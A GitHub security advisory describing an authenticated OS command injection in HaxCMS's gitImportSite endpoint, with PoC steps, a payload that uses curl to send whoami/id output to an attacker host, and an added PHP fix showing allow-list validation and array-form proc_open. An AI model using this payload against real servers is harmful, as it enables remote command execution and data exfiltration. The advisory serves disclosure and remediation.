GHSA-g4cf-pp4x-hqgw

GitHub Security Advisory

HaxCMS-PHP Command Injection Vulnerability

GitHub Reviewed · Severity: HIGH · Has CVE

Advisory Details

### Summary
The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates that user input. The 'set_remote' function later passes this input into 'proc_open', yielding OS command injection.

### Details
The vulnerability exists in the logic of the 'gitImportSite' function, located in 'Operations.php'. The current implementation relies only on the 'filter_var' and 'strpos' functions to validate the URL, which is not sufficient to ensure the absence of all Bash special characters usable for command injection.
![gitImportSite](https://github.com/user-attachments/assets/af9935ef-4735-446d-833f-2c2590ff1508)

#### Affected Resources
• Operations.php:2103 gitImportSite()
• `<domain>/<user>/system/api/gitImportSite`

### PoC
To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note that a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').

1. Start a webserver.
![webserver](https://github.com/user-attachments/assets/8594f9b1-67fa-4352-bbc3-310bb164ec9b)

2. Initiate a request to the 'archiveSite' endpoint.
![archiveSite](https://github.com/user-attachments/assets/08503f36-d984-4d53-8fe6-577ad78d5eb7)

3. Capture and modify the request in BurpSuite.
![request-modification](https://github.com/user-attachments/assets/61cd211e-afd3-453e-b86b-58bccffaf824)

4. Observe command output in the HTTP request from the server.
![command-output](https://github.com/user-attachments/assets/35f32274-b709-41d5-adaa-bea48f5cf33c)

#### Command Injection Payload
```bash
http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef
```

### Impact
An authenticated attacker can craft a URL string that bypasses the validation checks performed by the 'filter_var' and 'strpos' functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request to a server they control.
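The Details section above explains why 'filter_var' plus 'strpos' is not a sufficient gate before 'proc_open'. The following PHP is an added illustration of the two defensive changes that close this class of bug; it is not HaxCMS code, and the function names 'validateGitRemoteUrl' and 'setRemote' are hypothetical. It assumes PHP 7.4 or later, where 'proc_open' accepts the command as an array so that no shell ever parses the URL, and it pairs that with an explicit allow-list of URL characters rather than trying to deny-list shell metacharacters.

```php
<?php
// Added example, not part of the HaxCMS-PHP project. Demonstrates an
// allow-list URL check plus shell-free proc_open for a git remote URL.
declare(strict_types=1);

/**
 * Return the URL unchanged if it is acceptable as a git remote, else null.
 * filter_var(FILTER_VALIDATE_URL) still accepts ';', '$', '(', ')', '{', '}'
 * and '#', so it is only the first gate here, never the last one.
 */
function validateGitRemoteUrl(string $url): ?string
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Only plain http(s) remotes; this also blocks ext:: style transports
    // and any value that starts with '-' and could be read as a git option.
    if (!in_array(strtolower($parts['scheme']), ['https', 'http'], true)) {
        return null;
    }
    // No credentials, query string or fragment in a remote URL.
    if (isset($parts['user'], $parts['pass']) || isset($parts['query']) || isset($parts['fragment'])) {
        return null;
    }
    // Allow-list: host chars, optional port, path restricted to [A-Za-z0-9._-/].
    // Deliberately narrow (no IPv6 literals, no percent-encoding); widen only
    // with characters you have reasoned about.
    $pattern = '~^https?://[A-Za-z0-9.\-]+(:[0-9]{1,5})?(/[A-Za-z0-9._\-/]*)?$~';
    if (preg_match($pattern, $url) !== 1) {
        return null;
    }
    return $url;
}

/**
 * Point 'origin' at $url using an argv array. With an array, proc_open
 * executes git directly (no /bin/sh), so shell metacharacters in $url are
 * inert even if validation were ever bypassed. Returns git's exit status.
 */
function setRemote(string $repoDir, string $url): int
{
    $cmd  = ['git', '-C', $repoDir, 'remote', 'set-url', 'origin', $url];
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        return 1;
    }
    fclose($pipes[0]);
    stream_get_contents($pipes[1]); // discard stdout
    stream_get_contents($pipes[2]); // discard stderr
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);
}

// Constructed inputs: one benign remote, one shaped like the advisory's
// payload (single quotes keep ${IFS} and $(...) literal in PHP).
$inputs = [
    'https://example.com/org/site.git',
    'http://203.0.113.5/.git;curl${IFS}203.0.113.5/$(whoami)#=abcdef',
];
foreach ($inputs as $in) {
    $verdict = validateGitRemoteUrl($in) === null ? 'REJECT' : 'ACCEPT';
    echo $verdict, ' ', $in, PHP_EOL;
}
```

Running the script prints ACCEPT for the first input and REJECT for the second. The two layers are independent on purpose: the allow-list stops hostile input at the API boundary, and the array form of 'proc_open' means a future validation regression would not reintroduce shell parsing of the URL.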

Affected Packages

npm @haxtheweb/haxcms-nodejs
Affected versions: 0 (fixed in 11.0.3)

Key Information

GHSA ID: GHSA-g4cf-pp4x-hqgw
Published: June 9, 2025 8:30 PM
Last Modified: June 9, 2025 9:44 PM
CVSS Score: 7.5 / 10
Primary Ecosystem: npm
Primary Package: @haxtheweb/haxcms-nodejs
GitHub Reviewed: Yes

Dataset

Last updated: June 18, 2025 6:25 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.